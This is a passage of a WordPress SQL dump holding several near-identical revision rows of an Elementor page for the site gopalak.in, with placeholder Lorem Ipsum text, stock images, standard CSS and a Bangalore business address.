#1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:00','2022-09-30 06:05:00','',1373,'https://gopalak.in/?p=1463',0,'revision','',0),(1464,1,'2022-09-30 11:35:25','2022-09-30 06:05:25','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:25','2022-09-30 06:05:25','',1373,'https://gopalak.in/?p=1464',0,'revision','',0),(1465,1,'2022-09-30 11:35:25','2022-09-30 06:05:25','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:25','2022-09-30 06:05:25','',1373,'https://gopalak.in/?p=1465',0,'revision','',0),(1466,1,'2022-09-30 11:35:25','2022-09-30 06:05:25','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:25','2022-09-30 06:05:25','',1373,'https://gopalak.in/?p=1466',0,'revision','',0),(1468,1,'2022-09-30 11:39:49','2022-09-30 06:09:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:39:49','2022-09-30 06:09:49','',1373,'https://gopalak.in/?p=1468',0,'revision','',0),(1469,1,'2022-09-30 11:39:49','2022-09-30 06:09:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column 